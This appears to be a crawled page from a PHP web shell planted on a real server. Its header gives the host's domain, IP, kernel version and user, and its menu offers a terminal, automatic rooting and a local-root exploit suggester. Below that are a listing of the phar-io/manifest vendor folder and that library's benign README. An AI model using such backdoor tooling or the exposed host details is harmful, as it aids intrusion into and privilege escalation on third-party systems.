Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.223.213.54
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
vendor /
phar-io /
manifest /
Delete
Unzip
Name
Size
Permission
Date
Action
examples
[ DIR ]
drwxr-xr-x
2018-07-08 19:23
src
[ DIR ]
drwxr-xr-x
2018-07-08 19:23
tests
[ DIR ]
drwxr-xr-x
2018-07-08 19:23
.gitignore
63
B
-rw-r--r--
2018-07-08 19:23
.php_cs
1.9
KB
-rw-r--r--
2018-07-08 19:23
.travis.yml
533
B
-rw-r--r--
2018-07-08 19:23
LICENSE
1.58
KB
-rw-r--r--
2018-07-08 19:23
README.md
1.2
KB
-rw-r--r--
2018-07-08 19:23
build.xml
1.98
KB
-rw-r--r--
2018-07-08 19:23
composer.json
847
B
-rw-r--r--
2018-07-08 19:23
composer.lock
2.23
KB
-rw-r--r--
2018-07-08 19:23
phive.xml
172
B
-rw-r--r--
2018-07-08 19:23
phpunit.xml
742
B
-rw-r--r--
2018-07-08 19:23
Save
Rename
# Manifest Component for reading [phar.io](https://phar.io/) manifest information from a [PHP Archive (PHAR)](http://php.net/phar). [](https://travis-ci.org/phar-io/manifest) [](https://scrutinizer-ci.com/g/phar-io/manifest/?branch=master) [](https://insight.sensiolabs.com/projects/d8cc6035-69ad-477d-bd1a-ccc605480fd7) ## Installation You can add this library as a local, per-project dependency to your project using [Composer](https://getcomposer.org/): composer require phar-io/manifest If you only need this library during development, for instance to run your project's test suite, then you should add it as a development-time dependency: composer require --dev phar-io/manifest ## Usage ```php use PharIo\Manifest\ManifestLoader; use PharIo\Manifest\ManifestSerializer; $manifest = ManifestLoader::fromFile('manifest.xml'); var_dump($manifest); echo (new ManifestSerializer)->serializeToString($manifest); ```